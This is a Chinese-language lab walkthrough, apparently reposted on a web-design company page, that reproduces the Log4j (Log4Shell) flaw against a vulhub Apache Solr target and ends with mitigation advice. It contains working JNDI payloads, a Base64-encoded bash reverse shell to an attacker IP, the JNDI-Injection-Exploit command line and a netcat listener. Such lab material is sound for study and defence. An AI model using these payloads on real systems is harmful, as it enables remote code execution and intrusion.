接网站开发项目平台苏州做网站哪家专业
2026/4/6 7:35:11 网站建设 项目流程
接网站开发项目平台,苏州做网站哪家专业,免费网站软件正能量,南京专业网站制作公司一、 漏洞介绍 1. 简介 Apache log4j是Apache的一个开源项目#xff0c;Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架#xff0c;并且引入了大量丰富的特性#xff0c;可以控制日志信息输送的目的地为控制台、文件、GUI组建等#xff0c;被应用于业务系…一、 漏洞介绍1. 简介Apache log4j是Apache的一个开源项目Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架并且引入了大量丰富的特性可以控制日志信息输送的目的地为控制台、文件、GUI组建等被应用于业务系统开发用于记录程序输入输出日志信息。2. 漏洞成因当用户输入信息时应用程序中的log4j2组件会将信息记录到日志中假如日志中含有该语句${jndi:ldap:192.168.191.1:1099/exp}log4j就会去解析该信息通过jndi的lookup()方法去解析该URLldap:192.168.191.1:1099/exp解析到ldap就会去192.168.61.129:1099的ldap服务找名为shell的资源如果找不到就会去http服务中找在http中找到shell之后就会将资源信息返回给应用程序的log4j组件log4j组件就会下载下来然后发现shell是一个.class文件就会去执行里面的代码从而实现注入攻击者就可以通过shell实现任意的命令执行造成严重危害。3.受影响版本Apache Log4j 2.x 2.14.1。二、 漏洞复现1. 环境部署使用Ubuntu24系统vulhub搭建漏洞环境。具体搭建步骤详见Ubuntu24 Docker-vulhub靶场安装-CSDN博客https://blog.csdn.net/weixin_46098351/article/details/155501153?spm1001.2014.3001.55012. 复现步骤1、进入vulhub目录cd dockercd vulhub2、进入log4j目录CVE-2021-44228。cd log4jcd CVE-2021-442283、启动靶场。docker compose builddocker compose up -d4、查看运行的端口可以看到运行在8983端口。docker ps5、查看漏洞说明。cat README.zh-cn.md6、靶场启动成功后使用浏览器访问Apache Solr的后台界面系统IP 端口号8983。7、漏洞证明1用Yakit抓包使用自带的DNSLog功能生成一个独立的临时域名vzinpjjsus.lfcx.eu.org也可以通过其它DNSLog平台如http://dnslog.cn/等获取域名。2构造payload${jndi:ldap://vzinpjjsus.lfcx.eu.org}点击发包即可可以看到得到了DNS解析记录证明Log4j漏洞存在。3构造payloadaction${jndi:ldap://vzinpjjsus.lfcx.eu.org}点击发包可以得到Java版本为1.8.0_102。8、反弹shell使用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用1下载工具Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit将其放入Kali中我图方便直接放桌面了。2使用反弹shell指令并对指令进行Base64编码。(https://tool.chinaz.com/tools/base64.aspx)反弹shell指令结构bash -i /dev/tcp/Kali攻击机IP/任意未被占用端口 01bash -i /dev/tcp/192.168.191.128/4444 01 #Base64编码结果YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE5MS4xMjgvNDQ0NCAwPiYxCgoK3进入目录调用工具将编码后的反弹shell指令通过-C参数输入JNDI工具通过-A参数指定kali攻击机的ip地址。java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all\ .jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE5MS4xMjgvNDQ0NCAwPiYxCgoK}|{base64,-d}|{bash,-i} -A 192.168.191.1284在Kali另一个窗口监听4444端口。nc -lnvp 44445将Yakit数据包中的payload替换为JNDI工具中生成的参数ldap://192.168.191.128:1389/tslvj1完整访问链接为GET /solr/admin/cores?action${jndi:ldap://192.168.191.128:1389/tslvj1} HTTP/1.1生成的其它payload我还没试过可自行尝试。6点击发包Kali的监听端口成功接收到反弹shell。若直接发包后反弹不成功可以将payload参数 ${jndi:ldap://192.168.191.128:1389/tslvj1}进行URL编码后尝试。9、移除环境Vulhub中所有环境均为漏洞靶场在测试结束后请及时关闭并移除环境避免被他人恶意利用。虽然靶场全部运行在Docker中但大多数恶意软件并不会因为运行在容器中就失去效果docker-compose会默认根据当前目录下的配置文件启动容器在关闭及移除环境的时候也需要在对应目录下。我们执行docker-compose up -d后不要离开当前目录即可漏洞测试结束后执行如下命令移除环境docker compose down10、修复建议1添加jvm启动参数-Dlog4j2.formatMsgNoLookupstrue2在应用classpath下添加log4j2.component.properties配置文件文件内容为log4j2.formatMsgNoLookupstrue3JDK使用11.0.1、8u191、7u201、6u211及以上的高版本4部署使用第三方防火墙产品进行安全防护。5升级至最新版本。

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询